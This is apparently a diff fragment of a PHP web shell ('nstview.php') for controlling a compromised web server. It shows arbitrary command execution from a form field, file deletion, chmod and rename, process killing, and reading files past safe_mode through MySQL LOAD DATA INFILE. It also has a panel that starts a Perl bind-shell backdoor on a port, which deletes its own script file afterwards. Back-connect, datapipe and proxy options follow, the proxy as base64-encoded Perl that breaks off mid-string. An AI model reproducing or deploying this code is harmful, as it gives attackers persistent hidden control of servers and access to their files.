+<form method=post>
+Total commands: $c_f<br>
+<select name=sh3>";
+
+$c=substr_count($fast_commands," (nst) ");
+for($i=0; $i<=$c; $i++){
+       $expl2=explode("\r\n",$fast_commands);
+        $expl=explode(" (nst) ",$expl2[$i]);
+        if(trim($expl[1])!=""){
+        print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
+   }
+}
+
+print "</select><br>
+<input type=submit value=Exec>
+</form>
+";
+}
+}#end of os unix
+
+
+if($os=="win"){
+function fastcmd(){
+global $fast_commands_win;
+$c_f=explode("\n",$fast_commands_win);
+$c_f=count($c_f)-2;
+print "
+<form method=post>
+Total commands: $c_f<br>
+<select name=sh3>";
+
+$c=substr_count($fast_commands_win," (nst) ");
+for($i=0; $i<=$c; $i++){
+       $expl2=explode("\r\n",$fast_commands_win);
+        $expl=explode(" (nst) ",$expl2[$i]);
+        if(trim($expl[1])!=""){
+        print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
+   }
+}
+
+print "</select><br>
+<input type=submit value=Exec>
+</form>
+";
+}
+}#end of os win
+
+
+echo "
+<tr><td>";
+if(@$_GET['sh311']=="1"){echo "<center>cmd<br>pwd:
+";
+chdir($d);
+echo getcwd()."<br><br>
+Fast cmd:<br>";
+fastcmd();
+if($os=="win"){$d=str_replace("/","\\\\",$d);}
+print "
+<a href=\"javascript:cwd('$d ')\">Insert pwd</a>
+<form name=sh311Form method=post><input name=sh3 size=110></form></center><br>
+";
+if(@$_POST['sh3']){
+$sh3=$_POST['sh3'];
+echo "<pre>";
+print `$sh3`;
+echo "</pre>";
+}
+}
+
+if(@$_GET['sh311']=="2"){
+echo "<center>cmd<br>
+pwd:
+";
+chdir($d);
+echo getcwd()."<br><br>
+Fast cmd:<br>";
+fastcmd();
+if($os=="win"){$d=str_replace("/","\\\\",$d);}
+print "
+<a href=\"javascript:cwd('$d ')\">Insert pwd</a>
+<form name=sh311Form method=post><input name=sh3 size=110></form></center><br>";
+if(@$_POST['sh3']){
+$sh3=$_POST['sh3'];
+echo "<pre>"; print `$sh3`; echo "</pre>";}
+echo $copyr;
+exit;}
+
+if(@$_GET['delfl']){
+@$delfolder=$_GET['delfolder'];
+echo "DELETE FOLDER: <font color=red>".@$_GET['delfolder']."</font><br>
+(All files must be writable)<br>
+<a href='$php_self?deldir=1&dir=".@$delfolder."&rback=".@$_GET['rback']."'>Yes</a> || <a href='$php_self?d=$d'>No</a><br><br>
+";
+echo $copyr;
+exit;
+}
+
+
+$mkdir=$_GET['mkdir'];
+if($mkdir){
+print "<br><b>Create Folder in $d :</b><br><br>
+<form method=post>
+New folder name:<br>
+<input name=dir_n size=30>
+</form><br>
+";
+if($_POST['dir_n']){
+mkdir($d."/".$_POST['dir_n']) or die('Cannot create directory '.$_POST['dir_n']);
+print "<b><font color=green>Directory created success!</font></b>";
+}
+print $copyr;
+die;
+}
+
+
+$mkfile=$_GET['mkfile'];
+if($mkfile){
+print "<br><b>Create file in $d :</b><br><br>
+<form method=post>
+File name:<br>
+(example: hello.txt , hello.php)<br>
+<input name=file_n size=30>
+</form><br>
+";
+if($_POST['file_n']){
+$fp=fopen($d."/".$_POST['file_n'],"w") or die('Cannot create file '.$_POST['file_n']);
+fwrite($fp,"");
+print "<b><font color=green>File created success!</font></b>";
+}
+print $copyr;
+die;
+}
+
+
+$ps_table=$_GET['ps_table'];
+if($ps_table){
+
+if($_POST['kill_p']){
+exec("kill -9 ".$_POST['kill_p']);
+}
+
+$str=`ps aux`;
+
+# You can put here preg_match_all for other distrib/os
+preg_match_all("/(?:.*?)([0-9]{1,7})(.*?)\s\s\s[0-9]:[0-9][0-9]\s(.*)/i",$str,$matches);
+
+
+print "<br><b>PS Table :: Fast kill program<br>
+(p.s: Tested on Linux slackware 10.0)<br>
+<br></b>";
+print "<center><table border=1>";
+for($i=0; $i<count($matches[3]); $i++){
+$expl=explode(" ",$matches[0][$i]);
+print "<tr><td>$expl[0]</td><td>PID: ".$matches[1][$i]." :: ".$matches[3][$i]."</td><form method=post><td><font color=red>Kill: <input type=submit name=kill_p value=".trim($matches[1][$i])."></td></form></tr>";
+}#end of for
+print "</table></center><br><br>";
+unset($str);
+print $copyr;
+die;
+}#end of ps table
+
+
+$read_file_safe_mode=$_GET['read_file_safe_mode'];
+if($read_file_safe_mode){
+
+if(!isset($_POST['l'])){$_POST['l']="root";}
+
+print "<br>
+Read file content using MySQL - when <b>safe_mode</b>, <b>open_basedir</b> is <font color=green>ON</font><Br>
+<form method=post>
+<table>
+<tr><td>Addr:</td><Td> <input name=serv_ip value='127.0.0.1'><input name=port value='3306' size=6></td></tr>
+<tr><td>Login:</td><td><input name=l value=".$_POST['l']."></td></tr>
+<tr><td>Passw:</td><td><input name=p value=".$_POST['p']."></td></tr></table>
+(example: /etc/hosts)<br>
+<input name=read_file size=45><br>
+<input type=submit value='Show content'>
+</form>
+<br>";
+
+if($_POST['read_file']){
+$read_file=$_POST['read_file'];
+@mysql_connect($_POST['serv_ip'].":".$_POST['port'],$_POST['l'],$_POST['p']) or die("<font color=red>".mysql_error()."</font>");
+mysql_create_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+mysql_select_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+mysql_query('CREATE TABLE `tmp_file` ( `file` LONGBLOB NOT NULL );') or die("<font color=red>".mysql_error()."</font>");
+mysql_query("LOAD DATA INFILE \"".addslashes($read_file)."\" INTO TABLE tmp_file");
+$query = "SELECT * FROM tmp_file";
+$result = mysql_query($query) or die("<font color=red>".mysql_error()."</font>");
+print "<b>File content</b>:<br><br>";
+for($i=0;$i<mysql_num_fields($result);$i++){
+$name=mysql_field_name($result,$i);}
+while($line=mysql_fetch_array($result, MYSQL_ASSOC)){
+foreach ($line as $key =>$col_value) {
+print htmlspecialchars($col_value)."<br>";}}
+mysql_free_result($result);
+mysql_drop_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+}
+
+
+print $copyr;
+die;
+}#end of read_file_safe_mode
+
+
+# sys
+$wich_f=$_GET['wich_f'];
+$delete=$_GET['delete'];
+$del_f=$_GET['del_f'];
+$chmod=$_GET['chmod'];
+$ccopy_to=$_GET['ccopy_to'];
+
+
+# delete
+if(@$_GET['del_f']){
+if(!isset($delete)){
+print "<font color=red>Delete this file?</font><br>
+<b>$d/$wich_f<br><br></b>
+<a href='$php_self?d=$d&del_f=$wich_f&delete=1'>Yes</a> / <a href='$php_self?d=$d'>No</a>
+";}
+if($delete==1){
+unlink($d."/".$del_f);
+print "<b>File: <font color=green>$d/$del_f DELETED!</font></b>
+<br><b> <a href='$php_self?d=$d'># BACK</a>
+";
+}
+echo $copyr;
+exit;
+}
+
+
+# copy to
+if($ccopy_to){
+$wich_f=$_POST['wich_f'];
+$to_f=$_POST['to_f'];
+print "<font color=green>Copy file:<br>
+$d/$ccopy_to</font><br>
+<br>
+<form method=post>
+File:<br><input name=wich_f size=100 value='$d/$ccopy_to'><br><br>
+To:<br><input name=to_f size=100 value='$d/nst_$ccopy_to'><br><br>
+<input type=submit value=Copy></form><br><br>
+";
+
+if($to_f){
+@copy($wich_f,$to_f) or die("<font color=red>Cannot copy!!! maybe folder is not writable</font>");
+print "<font color=green><b>Copy success!!!</b></font><br>";
+}
+
+echo $copyr;
+exit;
+}
+
+
+# chmod
+if(@$_GET['chmod']){
+$perms = @fileperms($d."/".$wich_f);
+print "<b><font color=green>CHMOD file $d/$wich_f</font><br>
+<br><center>This file chmod is</b> ";
+print perm($perms);
+print "</center>
+<br>";
+$chmd=<<<HTML
+
+<script>
+<!--
+
+function do_chmod(user) {
+        var field4 = user + "4";
+        var field2 = user + "2";
+        var field1 = user + "1";
+        var total = "t_" + user;
+        var symbolic = "sym_" + user;
+        var number = 0;
+        var sym_string = "";
+
+        if (document.chmod[field4].checked == true) { number += 4; }
+        if (document.chmod[field2].checked == true) { number += 2; }
+        if (document.chmod[field1].checked == true) { number += 1; }
+
+        if (document.chmod[field4].checked == true) {
+                sym_string += "r";
+        } else {
+                sym_string += "-";
+        }
+        if (document.chmod[field2].checked == true) {
+                sym_string += "w";
+        } else {
+                sym_string += "-";
+        }
+        if (document.chmod[field1].checked == true) {
+                sym_string += "x";
+        } else {
+                sym_string += "-";
+        }
+
+        if (number == 0) { number = ""; }
+        document.chmod[total].value = number;
+        document.chmod[symbolic].value = sym_string;
+
+        document.chmod.t_total.value = document.chmod.t_owner.value + document.chmod.t_group.value + document.chmod.t_other.value;
+        document.chmod.sym_total.value = "-" + document.chmod.sym_owner.value + document.chmod.sym_group.value + document.chmod.sym_other.value;
+}
+//-->
+</script>
+
+
+
+<form name="chmod" method=post>
+<p><table cellpadding="0" cellspacing="0" border="0" bgcolor="silver"><tr><td width="100%" valign="top"><table width="100%" cellpadding="5" cellspacing="2" border="0"><tr><td width="100%" bgcolor="#008000" align="center" colspan="5"><font color="#ffffff" size="3"><b>CHMOD (File Permissions)</b></font></td></tr>
+        <tr bgcolor="gray">
+                <td align="left"><b>Permission</b></td>
+                <td align="center"><b>Owner</b></td>
+                <td align="center"><b>Group</b></td>
+                <td align="center"><b>Other</b></td>
+                <td bgcolor="#dddddd" rowspan="4"> </td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Read</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner4" value="4" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group4" value="4" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other4" value="4" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Write</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner2" value="2" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group2" value="2" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other2" value="2" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Execute</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner1" value="1" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group1" value="1" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other1" value="1" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="right" nowrap>Octal:</td>
+                <td align="center"><input type="text" name="t_owner" value="" size="1"></td>
+                <td align="center"><input type="text" name="t_group" value="" size="1"></td>
+                <td align="center"><input type="text" name="t_other" value="" size="1"></td>
+                <td align="left"><b>=</b> <input type="text" name="t_total" value="777" size="3"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="right" nowrap>Symbolic:</td>
+                <td align="center"><input type="text" name="sym_owner" value="" size="3"></td>
+                <td align="center"><input type="text" name="sym_group" value="" size="3"></td>
+                <td align="center"><input type="text" name="sym_other" value="" size="3"></td>
+                <td align="left" width=100><b>=</b> <input type="text" name="sym_total" value="" size="10"></td>
+        </tr>
+</table></td></tr></table></p>
+HTML;
+
+print "<center>".$chmd."
+
+<b>$d/$wich_f</b><br><br>
+<input type=submit value=CHMOD></form>
+</center>
+</form>
+";
+$t_total=$_POST['t_total'];
+if($t_total){
+chmod($d."/".$wich_f,$t_total);
+print "<center><font color=green><br><b>Now chmod is $t_total</b><br><br></font>";
+print "<a href='$php_self?d=$d'># BACK</a><br><br>";
+}
+echo $copyr;
+exit;
+}
+
+# rename
+if(@$_GET['rename']){
+print "<b><font color=green>RENAME $d/$wich_f ?</b></font><br><br>
+<center>
+<form method=post>
+<b>RENAME</b><br><u>$wich_f</u><br><Br><B>TO</B><br>
+<input name=rto size=40 value='$wich_f'><br><br>
+<input type=submit value=RENAME>
+</form>
+";
+
+@$rto=$_POST['rto'];
+
+if($rto){
+$fr1=$d."/".$wich_f;
+$fr1=str_replace("//","/",$fr1);
+$to1=$d."/".$rto;
+$to1=str_replace("//","/",$to1);
+
+rename($fr1,$to1);
+print "File <br><b>$wich_f</b><br>Renamed to <b>$rto</b><br><br>";
+
+echo "<meta http-equiv=\"REFRESH\" content=\"3;URL=".$php_self."?d=".$d."&rename=1&wich_f=".$rto."\">";
+
+}
+
+echo $copyr;
+exit;
+}
+
+
+
+
+if(@$_GET['deldir']){
+@$dir=$_GET['dir'];
+function deldir($dir)
+{
+$handle = @opendir($dir);
+while (false!==($ff = @readdir($handle))){
+if($ff != "." && $ff != ".."){
+if(@is_dir("$dir/$ff")){
+deldir("$dir/$ff");
+}else{
+@unlink("$dir/$ff");
+}}}
+@closedir($handle);
+if(@rmdir($dir)){
+@$success = true;}
+return @$success;
+}
+$dir=@$dir;
+deldir($dir);
+
+$rback=$_GET['rback'];
+@$rback=explode("/",$rback);
+$crb=count($rback);
+for($i=0; $i<$crb-1; $i++){
+        @$x.=$rback[$i]."/";
+}
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL='$php_self?d=".@$x."'\">";
+echo $copyr;
+exit;}
+
+
+if(@$_GET['t']=="tools"){
+        # unix
+if($os=="unix"){
+print "
+<center><br>
+<font color=red><b>P.S: After you Start, your browser may stuck! You must close it, and then run nstview.php again.</b><br></font>
+<table border=1>
+<tr><td align=center><b>[Name]</td><td align=center><b>[C]</td><td align=center><b>[Port]</td><td align=center><b>[Perl]</td><td align=center><b>[Port]</td><td align=center><b>[Other options, info]</td></tr>
+<tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input type=submit name=c_bd value='Start' style='background-color:green;'></td><td><input name=port size=6 value=5545></td></form><form method=post><td><input type=submit name=perl_bd value='Start' style='background-color:green;'></td><td><input name=port value=5551 size=6></td><td>none</td></form></tr>
+<tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><input type=submit value='Start' name=bc_c style='background-color:green;'></td><td><input name=port_c size=6 value=5546></td><td><input type=submit value='Start' name=port_p disabled style='background-color:gray;'></td><td><input name=port value=5552 size=6></td><td>b.c. ip: <input name=ip value='".$_SERVER['REMOTE_ADDR']."'> nc -l -p <i>5546</i></td></form></tr>
+<tr><form method=post><td><font color=red><b>Datapipe:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port_1 size=6 value=5547></td><td><input type=submit value='Start' name=datapipe_pl style='background-color:green;'></td><td><input name=port_2 value=5553 size=6></td><td>other serv ip: <input name=ip> port: <input name=port_3 value=5051 size=6></td></form></tr>
+<tr><form method=post><td><font color=red><b>Web proxy:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5548></td></form><form method=post><td><input type=submit value='Start' name=perl_proxy style='background-color:green;'></td><td><input name=port size=6 value=5554></td></form><td>none</td></tr>
+<tr><form method=post><td><font color=red><b>Socks 4 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5549></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5555></td><td>none</td></tr>
+<tr><form method=post><td><font color=red><b>Socks 5 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5550></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5556></td><td>none</td></tr>
+</table>
+</center>
+<br><Br>
+";
+}#end of unix
+
+
+if($_POST['perl_bd']){
+$port=$_POST['port'];
+$perl_bd_scp = "
+use Socket;\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
+setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);bind(S,sockaddr_in(\$p,INADDR_ANY));
+listen(S,50);while(1){accept(X,S);if(!(\$pid=fork)){if(!defined \$pid){exit(0);}
+open STDIN,\"<&X\";open STDOUT,\">&X\";open STDERR,\">&X\";exec(\"/bin/sh -i\");
+close X;}}";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_bd.pl","w");
+fwrite($fp,"$perl_bd_scp");
+passthru("nohup perl /tmp/nst_perl_bd.pl &");
+unlink("/tmp/nst_perl_bd.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bd_tmp");
+$fp=fopen(".nst_bd_tmp/nst_perl_bd.pl","w");
+fwrite($fp,"$perl_bd_scp");
+passthru("nohup perl .nst_bd_tmp/nst_perl_bd.pl &");
+unlink(".nst_bd_tmp/nst_perl_bd.pl");
+rmdir(".nst_bd_tmp");
+}
+}
+$show_ps="1";
+}#end of start perl_bd
+
+if($_POST['perl_proxy']){
+$port=$_POST['port'];
+$perl_proxy_scp = "IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4vcGVybA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtIGh0dHAgcHJveHkgc2VydmVyLiB6YXB1c2thamVtOiBwZXJsIHByb3h5LnBsCTgxODEgbHVib2ogcG9ydCB2aTZpIDEwMjQtDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KI3JlcXVpcmUgInN5cy9zb2NrZXQucGgiOw0KdXNlIFNvY2tldDsNCnNyYW5kICh0aW1lfHwkJCk7DQojLS0tICBEZWZpbmUgYSBmcmllbmRseSBleGl0IGhhbmRsZXINCiRTSUd7J0tJTEwnfSA9ICRTSUd7UVVJVH0gPSAkU0lHe0lOVH0gPSAnZXhpdF9oYW5kbGVyJzsNCnN1YiBleGl0X2hhbmRsZXIgew0KICAgIHByaW50ICJcblxuIC0tLSBQcm94eSBzZXJ2ZXIgaXMgZHlpbmcgLi4uXG5cbiI7DQogICAgY2xvc2UoU09DS0VUKTsNCiAgICBleGl0Ow0KDQp9DQojLS0tICBTZXR1cCBzb2NrZXQNCg0KJHwgPSAxOw0KJHByb3h5X3BvcnQgPSBzaGlmdChAQVJHVik7DQokcHJveHlfcG9ydCA9IDgxODEgdW5sZXNzICRwcm94eV9wb3J0ID1+IC9cZCsvOw0KDQokc29ja2V0X2Zvcm1hdCA9ICdTIG4gYTQgeDgnOw0KJmxpc3Rlbl90b19wb3J0KFNPQ0tFVCwgJHByb3h5X3BvcnQpOw0KJGxvY2FsX2hvc3QgPSBgaG9zdG5hbWVgOw0KY2hvcCgkbG9jYWxfaG9zdCk7DQokbG9jYWxfaG9zdF9pcCA9IChnZXRob3N0YnluYW1lKCRsb2NhbF9ob3N0KSlbNF07DQpwcmludCAiIC0tLSBQcm94eSBzZXJ2ZXIgcnVubmluZyBvbiAkbG9jYWxfaG9zdCBwb3J0OiAkcHJveHlfcG9ydCBcblxuIjsNCiMtLS0gIExvb3AgZm9yZXZlciB0YWtpbmcgcmVxdWVzdHMgYXMgdGhleSBjb21lDQp3aGlsZSAoMSkgew0KIy0tLSAgV2FpdCBmb3IgcmVxdWVzdA0KICAgIHByaW50ICIgLS0tIFdhaXRpbmcgdG8gYmUgb2Ygc2VydmljZSAuLi5cbiI7DQogICAgKCRhZGRyID0gYWNjZXB0KENISUxELFNPQ0tFVCkpIHx8IGRpZSAiYWNjZXB0ICQhIjsNCiAgICAoJHBvcnQsJGluZXRhZGRyKSA9ICh1bnBhY2soJHNvY2tldF9mb3JtYXQsJGFkZHIpKVsxLDJdOw0KICAgIEBpbmV0YWRkciA9IHVucGFjaygnQzQnLCRpbmV0YWRkcik7DQogICAgcHJpbnQgIkNvbm5lY3Rpb24gZnJvbSAiLCBqb2luKCIuIiwgQGluZXRhZGRyKSwgIiAgcG9ydDogJHBvcnQgXG4iOw0KIy0tLSAgRm9yayBhIHN1YnByb2Nlc3MgdG8gaGFuZGxlIHJlcXVlc3QuDQojLS0tICBQYXJlbnQgcHJvY2VzIGNvbnRpbnVlcyBsaXN0ZW5pbmcuDQogICAgaWYgKGZvcmspIHsNCgl3YWl0OwkJIyBGb3Igbm93IHdlIHdhaXQgZm9yIHRoZSBjaGlsZCB0byBmaW5pc2gNCgluZXh0OwkJIyBXZSB3YWl0IHNvIHRoYXQgcHJpbnRvdXRzIGRvbid0IG1peA0KICAgIH0NCiMtLS0gIFJlYWQgZmlyc3QgbGluZSBvZiByZXF1ZXN0IGFuZCBhbmFseXplIGl0Lg0KIy0tLSAgUmV0dXJuIGFuZCBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QgbWV0aG9kLg0KICAgKCRmaXJzdCwkbWV0aG9kKSA9ICZhbmFseXplX3JlcXVlc3Q7DQojLS0tICBTZW5kIHJlcXVlc3QgdG8gcmVtb3RlIGhvc3QNCiAgICBwcmludCBVUkwgJGZpcnN0Ow0KICAgIHByaW50ICRmaXJzdDsNCiAgICB3aGlsZSAoPENISUxEPikgew0KCXByaW50ICRfOw0KCW5leHQgaWYgKC9Qcm94eS1Db25uZWN0aW9uOi8pOw0KCXByaW50IFVSTCAkXzsNCglsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvKTsNCiAgICB9DQogICAgaWYgKCRtZXRob2QgZXEgIlBPU1QiKSB7DQoJJGRhdGEgPSA8Q0hJTEQ+Ow0KCXByaW50ICRkYXRhOw0KCXByaW50IFVSTCAkZGF0YTsNCiAgICB9DQogICAgcHJpbnQgVVJMICJcbiI7DQojLS0tICBXYWl0IGZvciByZXNwb25zZSBhbmQgdHJhbnNmZXIgaXQgdG8gcmVxdWVzdG9yLg0KICAgIHByaW50ICIgLS0tIERvbmUgc2VuZGluZy4gUmVzcG9uc2U6IFxuXG4iOw0KICAgICRoZWFkZXIgPSAxOw0KICAgICR0ZXh0ID0gMDsNCiAgICB3aGlsZSAoPFVSTD4pIHsNCglwcmludCBDSElMRCAkXzsNCglpZiAoJGhlYWRlciB8fCAkdGV4dCkgewkgICAgICMgT25seSBwcmludCBoZWFkZXIgJiB0ZXh0IGxpbmVzIHRvIFNURE9VVA0KCSAgICBwcmludCAkXzsNCgkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15bXHNceDAwXSokLykgew0KCQkkaGVhZGVyID0gMDsNCgkgICAgfQ0KIwkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15Db250ZW50LXR5cGU6IHRleHQvKSB7DQojCQkkdGV4dCA9IDE7DQojCSAgICB9DQoJfQ0KICAgIH0NCiAgICBjbG9zZShVUkwpOw0KICAgIGNsb3NlKENISUxEKTsNCiAgICBleGl0OwkJCSMgRXhpdCBmcm9tIGNoaWxkIHByb2Nlc3MNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojLS0JYW5hbHl6ZV9yZXF1ZXN0CQkJCQkJCS0tDQojLS0JCQkJCQkJCQktLQ0KIy0tCUFuYWx5emUgYSBuZXcgcmVxdWVzdC4gIEZpcnN0IHJlYWQgaW4gZmlyc3QgbGluZSBvZiByZXF1ZXN0LgktLQ0KIy0tCVJlYWQgVVJMIGZyb20gaXQsIHByb2Nlc3MgVVJMIGFuZCBvcGVuIGNvbm5lY3Rpb24uCQktLQ0KIy0tCVJldHVybiBhbiBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QJLS0NCiMtLQltZXRob2QuCQkJCQkJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBhbmFseXplX3JlcXVlc3Qgew0KIy0tLSAgUmVhZCBmaXJzdCBsaW5lIG9mIEhUVFAgcmVxdWVzdA0KICAgICRmaXJzdCA9IDxDSElMRD47DQoNCiAgICAkdXJsID0gKCRmaXJzdCA9fiBtfChodHRwOi8vXFMrKXwpWzBdOw0KICAgIHByaW50ICJSZXF1ZXN0IGZvciBVUkw6ICAkdXJsIFxuIjsNCg0KIy0tLSAgQ2hlY2sgaWYgZmlyc3QgbGluZSBpcyBvZiB0aGUgZm9ybSBHRVQgaHR0cDovL2hvc3QtbmFtZSAuLi4NCiAgICAoJG1ldGhvZCwgJHJlbW90ZV9ob3N0LCAkcmVtb3RlX3BvcnQpID0gDQoJKCRmaXJzdCA9fiBtIShHRVR8UE9TVHxIRUFEKSBodHRwOi8vKFteLzpdKyk6PyhcZCopISApOw0KIy0tLSAgSWYgbm90LCBiYWQgcmVxdWVzdC4NCiAgICANCiAgICBpZiAoISRyZW1vdGVfaG9zdCkgew0KCXByaW50ICRmaXJzdDsNCgl3aGlsZSAoPENISUxEPikgew0KCSAgICBwcmludCAkXzsNCgkgICAgbGFzdCBpZiAoJF8gPX4gL15bXHNceDAwXSokLyk7DQoJfQ0KCXByaW50ICJJbnZhbGlkIEhUVFAgcmVxdWVzdCBmcm9tICIsIGpvaW4oIi4iLCBAaW5ldGFkZHIpLCAiXG4iOw0KIwlwcmludCBDSElMRCAiQ29udGVudC10eXBlOiB0ZXh0L3BsYWluIiwiXG5cbiI7DQoJcHJpbnQgQ0hJTEQgIkkgZG9uJ3QgdW5kZXJzdGFuZCB5b3VyIHJlcXVlc3QuXG4iOw0KCWNsb3NlKENISUxEKTsNCglleGl0Ow0KICAgIH0NCiMtLS0gIElmIHJlcXVlc3RlZCBVUkwgaXMgdGhlIHByb3h5IHNlcnZlciB0aGVuIGlnbm9yZSByZXF1ZXN0DQogICAgJHJlbW90ZV9pcCA9IChnZXRob3N0YnluYW1lKCRyZW1vdGVfaG9zdCkpWzRdOw0KICAgIGlmICgoJHJlbW90ZV9pcCBlcSAkbG9jYWxfaG9zdF9pcCkgJiYgKCRyZW1vdGVfcG9ydCBlcSAkcHJveHlfcG9ydCkpIHsNCglwcmludCAkZmlyc3Q7DQoJd2hpbGUgKDxDSElMRD4pIHsNCgkgICAgcHJpbnQgJF87DQoJICAgIGxhc3QgaWYgKCRfID1+IC9eW1xzXHgwMF0qJC8pOw0KCX0NCglwcmludCAiIC0tLSBDb25uZWN0aW9uIHRvIHByb3h5IHNlcnZlciBpZ25vcmVkLlxuIjsNCiMJcHJpbnQgQ0hJTEQgIkNvbnRlbnQtdHlwZTogdGV4dC9wbGFpbiIsIlxuXG4iOw0KCXByaW50IENISUxEICJJdCdzIG5vdCBuaWNlIHRvIG1ha2UgbWUgbG9vcCBvbiBteXNlbGYhLlxuIjsNCgljbG9zZShDSElMRCk7DQoJZXhpdDsNCiAgICB9DQojLS0tICBTZXR1cCBjb25uZWN0aW9uIHRvIHRhcmdldCBob3N0IGFuZCBzZW5kIHJlcXVlc3QNCiAgICAkcmVtb3RlX3BvcnQgPSAiaHR0cCIgdW5sZXNzICgkcmVtb3RlX3BvcnQpOw0KICAgICZvcGVuX2Nvbm5lY3Rpb24oVVJMLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7DQojLS0tICBSZW1vdmUgcmVtb3RlIGhvc3RuYW1lIGZyb20gVVJMDQogICAgICAgICRmaXJzdCA9fiBzL2h0dHA6XC9cL1teXC9dKy8vOw0KICAgICgkZmlyc3QsICRtZXRob2QpOw0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtLQlsaXN0ZW5fdG9fcG9ydChTT0NLRVQsICRwb3J0KQkJCQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgbGlzdGVucyB0byBhIHNwZWNpZmljIHBvcnQJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBsaXN0ZW5fdG9fcG9ydCB7DQogICAgbG9jYWwgKCRwb3J0KSA9ICRfWzFdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIsICRtYXhfcmVxdWVzdHMpOw0KICAgICRtYXhfcmVxdWVzdHMgPSAzOwkJIyBNYXggbnVtYmVyIG9mIG91dHN0YW5kaW5nIHJlcXVlc3RzDQogICAgJHNvY2tldF9mb3JtYXQgPSAnUyBuIGE0IHg4JzsNCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcGFja2VkX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICJcMFwwXDBcMCIpOw0KICAgIHNvY2tldCgkX1swXSwgJlBGX0lORVQsICZTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUgInNvY2tldDogJCEiOw0KICAgIGJpbmQoJF9bMF0sICRwYWNrZWRfcG9ydCkgfHwgZGllICJiaW5kOiAkISI7DQogICAgbGlzdGVuKCRfWzBdLCAkbWF4X3JlcXVlc3RzKSB8fCBkaWUgImxpc3RlbjogJCEiOw0KICAgICRjdXIgPSBzZWxlY3QoJF9bMF0pOyAgDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQogICA